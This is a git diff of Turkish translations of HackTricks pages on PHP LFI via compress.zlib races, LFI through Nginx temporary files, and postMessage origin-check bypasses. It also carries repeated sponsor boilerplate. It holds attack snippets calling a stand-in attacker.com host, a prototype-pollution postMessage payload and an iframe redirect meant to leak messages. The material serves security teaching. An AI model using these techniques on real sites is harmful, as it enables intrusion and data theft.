* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da **takip edin**.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -8,15 +8,15 @@ HackTricks'ı desteklemenin diğer yolları:
|
|||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -34,7 +34,7 @@ Bu, şu gibi bir çağrı anlamına gelir:
|
|||
```php
|
||||
file_get_contents("compress.zlib://http://attacker.com/file")
|
||||
```
|
||||
Sunucudan http://attacker.com/file isteğinde bulunacak, sunucu isteği geçerli bir HTTP yanıtı ile yanıtlayabilir, bağlantıyı açık tutabilir ve daha sonra ekstra veriler gönderebilir, bu veriler de dosyaya yazılacaktır.
|
||||
Sunucuya http://attacker.com/file isteği gönderir, sunucu isteği geçerli bir HTTP yanıtı ile yanıtlayabilir, bağlantıyı açık tutabilir ve daha sonra dosyaya yazılacak ek verileri gönderebilir.
|
||||
|
||||
Bu bilgiyi php-src kodunun main/streams/cast.c bölümünde görebilirsiniz:
|
||||
```c
|
||||
|
@ -50,21 +50,21 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
|
|||
|
||||
[**Bu CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) önceki hile kullanılarak çözüldü.
|
||||
|
||||
Saldırgan, **kurban sunucunun saldırganın sunucusundan bir dosyayı okuyarak bağlantı açmasını sağlayacak** olan **`compress.zlib`** protokolünü kullanacak.
|
||||
Saldırgan, **kurban sunucunun saldırganın sunucusundan bir dosyayı okuyarak bir bağlantı açmasını sağlayacak** olan **`compress.zlib`** protokolünü kullanacak.
|
||||
|
||||
Bu **bağlantı** varken saldırgan, sunucu tarafından sızdırılan geçici dosyanın yolunu **dışa aktaracak**.
|
||||
|
||||
Bu **bağlantı** açıkken saldırgan, kontrol ettiği geçici dosyayı yükleyen bir LFI'ı **sömürecek**.
|
||||
Bu **bağlantı** hala açıkken saldırgan, kontrol ettiği geçici dosyayı yükleyen bir LFI'yi **sömürecek**.
|
||||
|
||||
Ancak, web sunucusunda **`<?` içeren dosyaların yüklenmesini engelleyen bir kontrol** bulunmaktadır. Bu nedenle, saldırgan bir **Yarış Koşulu**'nu istismar edecektir. Hala açık olan bağlantıda, **saldırgan**, web sunucusunun yasaklı karakterleri içeren dosyayı kontrol ettiği **sonrasında PHP yüklemesini GÖNDERECEKTİR** ancak **içeriğini yüklemeden ÖNCE**.
|
||||
Ancak, web sunucusunda `<?` içeren dosyaların yüklenmesini **engelleyen bir kontrol** bulunmaktadır. Bu nedenle, saldırgan bir **Yarış Koşulu**'nu istismar edecektir. Hala açık olan bağlantıda, **saldırgan**, web sunucusunun yasaklı karakterleri içeren dosyayı kontrol ettiği **kontrol**den sonra **PHP yüklemesini GÖNDERECEK** ancak **içeriğini yüklemeden ÖNCE**.
|
||||
|
||||
Daha fazla bilgi için Yarış Koşulu ve CTF açıklamasını [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) adresinden kontrol edebilirsiniz.
|
||||
Daha fazla bilgi için Yarış Koşulu ve CTF'nin açıklamasını [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) adresinden kontrol edebilirsiniz.
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için ücretsiz işlevsellikler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -78,10 +78,10 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimizle**](https://opensea.io/collection/the-peass-family) tanışın
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking hilelerinizi paylaşarak HackTricks ve HackTricks Cloud** github depolarına PR gönderin.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,27 +2,27 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
|
||||
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -52,7 +52,7 @@ chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
|
|||
```
|
||||
Şu anda PHP genellikle PHP-FPM ve Nginx üzerinden dağıtılmaktadır. Nginx, istemci gövdesinin (post ile sınırlı olmayan) belirli bir eşiği aştığında geçici dosyalar yazacak olan kolayca gözden kaçabilen [istemci gövdesi arabellekleme](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) özelliğini sunar.
|
||||
|
||||
Bu özellik, Nginx'in aynı kullanıcı olarak çalıştığı durumlarda (genellikle www-data olarak yapılan) PHP ile dosya oluşturma yolu olmadan LFİ'lerin istismar edilmesine izin verir.
|
||||
Bu özellik, Nginx'in aynı kullanıcı olarak çalıştığı durumlarda (genellikle www-data olarak yapılan) PHP ile dosya oluşturma yolu olmadan LFİ'lerin istismar edilmesine olanak tanır.
|
||||
|
||||
İlgili Nginx kodu:
|
||||
```c
|
||||
|
@ -71,7 +71,7 @@ if (fd != -1 && !persistent) {
|
|||
return fd;
|
||||
}
|
||||
```
|
||||
Görülebilir ki **temp dosyası, Nginx tarafından açıldıktan hemen sonra silinir**. Neyse ki, silinen dosyaya hala bir referans elde etmek için bir yarış kullanılabilir **procfs** aracılığıyla:
|
||||
Görülebilir ki **tempfile, Nginx tarafından açıldıktan hemen sonra silinir**. Neyse ki, silinen dosyaya hala bir referans elde etmek için bir yarış kullanılabilir **procfs** aracılığıyla:
|
||||
```
|
||||
...
|
||||
/proc/34/fd:
|
||||
|
@ -292,13 +292,13 @@ read_file_multiprocess(requests_session, nginx_pids)
|
|||
|
||||
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) bir **karanlık ağ** destekli arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
|
@ -310,10 +310,10 @@ Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsi
|
|||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da takip edin.**
|
||||
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,21 +4,21 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hacklemeyi sıfırdan ileri seviyeye öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* Şirketinizi **HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** istiyorsanız [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
|
@ -58,14 +58,14 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
|
|||
## loop until win.length == 1 (until the iframe is loaded)
|
||||
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
|
||||
```
|
||||
**targetOrigin**'ın '\*' veya _https://company.com_ gibi bir URL olabileceğini unutmayın.\
|
||||
**targetOrigin**'in bir '\*' veya _https://company.com_ gibi bir URL olabileceğini unutmayın.\
|
||||
**İkinci senaryoda**, **mesaj sadece o alan adına gönderilebilir** (pencere nesnesinin kökeni farklı olsa bile).\
|
||||
**Joker karakteri** kullanıldığında, **mesajlar herhangi bir alan adına gönderilebilir** ve Pencere nesnesinin kökenine gönderilir.
|
||||
**Joker karakter** kullanıldığında, **mesajlar herhangi bir alana gönderilebilir** ve Pencere nesnesinin kökenine gönderilir.
|
||||
|
||||
### iframe ve wildcard hedefOrigin saldırısı
|
||||
|
||||
[**Bu raporda**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) açıklandığı gibi, **X-Frame-Header** koruması olmayan bir sayfa bulursanız ve bu sayfa **duyarlı** mesajları **wildcard** (\*) kullanarak **postMessage** ile gönderiyorsa, **iframe'ın kökenini değiştirerek** ve **duyarlı** mesajı size ait bir alan adına **sızdırabilirsiniz**.\
|
||||
Sayfanın iframelenebilmesine rağmen **targetOrigin** bir URL'ye ayarlanmış ve joker karakteri kullanılmamışsa, bu **hile işe yaramaz**.
|
||||
[**Bu raporda**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) açıklandığı gibi, **X-Frame-Header** koruması olmayan bir sayfa bulursanız ve bu sayfa **duyarlı** mesajları **wildcard** (\*) kullanarak **postMessage** ile gönderiyorsa, **iframe**'in **kökenini değiştirerek** ve **duyarlı** mesajı sizin kontrol ettiğiniz bir alan adına **sızdırabilirsiniz**.\
|
||||
Sayfa iframelenebilir ancak **targetOrigin** bir URL'ye ayarlanmışsa ve joker karakter kullanılmamışsa, bu **hile işe yaramaz**.
|
||||
```markup
|
||||
<html>
|
||||
<iframe src="https://docs.google.com/document/ID" />
|
||||
|
@ -82,7 +82,7 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
|
|||
```
|
||||
## addEventListener sömürüsü
|
||||
|
||||
**`addEventListener`**, JS tarafından **`postMessage` bekleyen`** işlevi bildirmek için kullanılan işlevdir.\
|
||||
**`addEventListener`**, JS tarafından kullanılan ve **`postMessages` bekleyen`** işlevi bildirmek için kullanılan bir işlevdir.\
|
||||
Aşağıdaki gibi bir kod kullanılacaktır:
|
||||
```javascript
|
||||
window.addEventListener("message", (event) => {
|
||||
|
@ -107,21 +107,21 @@ Mevcut sayfadaki olay dinleyicilerini bulmak için şunları yapabilirsiniz:
|
|||
|
||||
- [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) veya [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) gibi bir tarayıcı eklentisi kullanın. Bu tarayıcı eklentileri tüm mesajları yakalayacak ve size gösterecektir.
|
||||
|
||||
### Köken kontrolü atlatmaları
|
||||
### Köken kontrolü atlamaları
|
||||
|
||||
- **`event.isTrusted`** özelliği yalnızca gerçek kullanıcı eylemleri tarafından oluşturulan olaylar için `True` döndürdüğü için güvenli kabul edilir. Doğru bir şekilde uygulandığında atlatılması zor olmasına rağmen, güvenlik kontrollerindeki önemi dikkate değerdir.
|
||||
- PostMessage olaylarında köken doğrulaması için **`indexOf()`** kullanımı atlatılabilir olabilir. Bu zafiyeti gösteren bir örnek:
|
||||
- **`event.isTrusted`** özelliği yalnızca gerçek kullanıcı eylemleri tarafından oluşturulan olaylar için `True` döndürdüğü için güvenli kabul edilir. Doğru bir şekilde uygulandığında atlanması zor olmasına rağmen, güvenlik kontrollerindeki önemi dikkate değerdir.
|
||||
- PostMessage olaylarında köken doğrulaması için **`indexOf()`** kullanımı atlanabilir olabilir. Bu zafiyeti gösteren bir örnek:
|
||||
|
||||
```javascript
|
||||
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
|
||||
```
|
||||
- `String.prototype.search()` yöntemi olan **`search()`** metodu düzenli ifadeler için tasarlanmış olup, dizgiler için değil. Düzenli ifadeden başka bir şey geçirilmesi durumunda, bu, yöntemin potansiyel olarak güvensiz olmasına neden olabilir. Çünkü düzenli ifadede nokta (.) joker karakter olarak işlev görerek özel oluşturulmuş alanlarla doğrulamayı atlamaya olanak tanır. Örneğin:
|
||||
- `String.prototype.search()` yöntemi olan **`search()`** metodu düzenli ifadeler için tasarlanmış olup, dizgiler için değil. Düzenli ifadeden başka bir şey geçirmek, yöntemi potansiyel olarak güvensiz hale getirir. Çünkü düzenli ifadede nokta (.) joker karakter olarak işlev görerek özel olarak oluşturulmuş alanları atlamaya olanak tanır. Örneğin:
|
||||
|
||||
```javascript
|
||||
"https://www.safedomain.com".search("www.s.fedomain.com")
|
||||
```
|
||||
- **`match()`** fonksiyonu, `search()` gibi düzenli ifadeleri işler. Düzenli ifade yanlış yapılandırılmışsa, atlatılabilir olabilir.
|
||||
- `escapeHtml` fonksiyonu, karakterleri kaçırarak girişleri temizlemek için tasarlanmıştır. Ancak yeni bir kaçırılmış nesne oluşturmaz, mevcut nesnenin özelliklerini üzerine yazar. Bu davranış istismar edilebilir. Özellikle, bir nesne, kontrol edilen özelliğinin `hasOwnProperty`'yi kabul etmediği şekilde manipüle edilebilirse, `escapeHtml` beklenildiği gibi çalışmayabilir. Aşağıdaki örneklerde gösterildiği gibi:
|
||||
- **`match()`** fonksiyonu, `search()` gibi düzenli ifadeleri işler. Düzenli ifade yanlış yapılandırılmışsa, atlanmaya açık olabilir.
|
||||
- `escapeHtml` fonksiyonu, karakterleri kaçırarak girişleri temizlemek için tasarlanmıştır. Ancak yeni bir kaçırılmış nesne oluşturmaz, mevcut nesnenin özelliklerini üzerine yazar. Bu davranış istismar edilebilir. Özellikle, bir nesne, kontrol edilen özelliğinin `hasOwnProperty`'yi kabul etmediği şekilde manipüle edilebilirse, `escapeHtml` beklenildiği gibi çalışmaz. Aşağıdaki örneklerde gösterildiği gibi:
|
||||
|
||||
- Beklenen Başarısızlık:
|
||||
|
||||
|
@ -141,13 +141,13 @@ result.message; // "'"<b>\"
|
|||
Bu zafiyet bağlamında, `File` nesnesi, salt okunur `name` özelliği nedeniyle dikkate değer şekilde istismar edilebilir. Bu özellik, şablonlarda kullanıldığında, `escapeHtml` fonksiyonu tarafından temizlenmez ve potansiyel güvenlik risklerine yol açabilir.
|
||||
- JavaScript'teki `document.domain` özelliği, alanı kısaltmak için bir betik tarafından ayarlanabilir, aynı ana etki alanı içinde daha esnek aynı köken politikası uygulamasına olanak tanır.
|
||||
|
||||
### e.origin == window.origin atlatma
|
||||
### e.origin == window.origin atlaması
|
||||
|
||||
%%%%%% kullanarak bir web sayfasını **sandboxed iframe** içine yerleştirirken, iframe'ın kökeninin null olarak ayarlanacağını anlamak önemlidir. Bu, **sandbox öznitelikleri** ve bunların güvenlik ve işlevsellik üzerindeki etkileriyle ilgilenirken özellikle önemlidir.
|
||||
%%%%%% kullanarak bir web sayfasını **kumlanmış bir iframe** içine yerleştirirken, iframe'ın kökeninin null olarak ayarlanacağını anlamak önemlidir. Bu, **kum özellikleri** ve bunların güvenlik ve işlevsellik üzerindeki etkileriyle ilgilenirken özellikle önemlidir.
|
||||
|
||||
Sandbox özniteliğinde **`allow-popups`** belirterek, iframe'dan açılan herhangi bir açılır pencere, ebeveyninin sandbox kısıtlamalarını devralır. Bu, açılır pencerenin kökeninin de `null` olarak ayarlandığı anlamına gelir. Bu durum, açılır pencerenin kökeninin de `null` olarak ayarlandığı iframe'ın kökeniyle uyumlu hale getirilmesi anlamına gelir.
|
||||
Sandbox özelliğinde **`allow-popups`** belirterek, iframe'den açılan herhangi bir açılır pencere, ebeveyninin kum kısıtlamalarını devralır. Bu, açılır pencerenin kökeninin de `null` olarak ayarlandığı anlamına gelir. Bu durum, iframe'den açılır pencereye bir mesaj gönderildiğinde ve **`postMessage`** kullanılarak, hem gönderen hem de alıcı uçların kökenlerinin `null` olarak ayarlandığı bir senaryoya yol açar.
|
||||
|
||||
Sonuç olarak, bu koşullar altında bir açılır pencere açıldığında ve iframe'dan açılır pencereye **`postMessage`** kullanılarak bir mesaj gönderildiğinde, hem gönderme hem de alma uçlarının kökenleri `null` olarak ayarlanır. Bu durum, iframe'ın ve açılır pencerenin `null` olan aynı kökene sahip olması nedeniyle **`e.origin == window.origin`** ifadesinin doğru değerlendirilmesine (`null == null`) yol açar.
|
||||
Sonuç olarak, bu koşullar altında bir açılır pencere açıldığında ve bir mesaj iframe'den popup'a gönderildiğinde, hem iframe hem de popup'ın kökenlerinin `null` olarak ayarlandığı bir senaryoya yol açar. Bu durum, iframe ve popup'ın `null == null` olarak değerlendirildiği bir senaryoya yol açar, çünkü hem iframe hem de popup, `null` olan aynı köken değerini paylaşırlar.
|
||||
|
||||
Daha fazla bilgi için **okuyun**:
|
||||
|
||||
|
@ -157,14 +157,14 @@ Daha fazla bilgi için **okuyun**:
|
|||
|
||||
### e.source Atlatma
|
||||
|
||||
Mesajın, betiğin dinlediği pencereden geldiğini kontrol etmek mümkündür (özellikle **Tarayıcı uzantılarından Gelen İçerik Betikleri** için özellikle ilginçtir, mesajın aynı sayfadan mı gönderildiğini kontrol etmek için):
|
||||
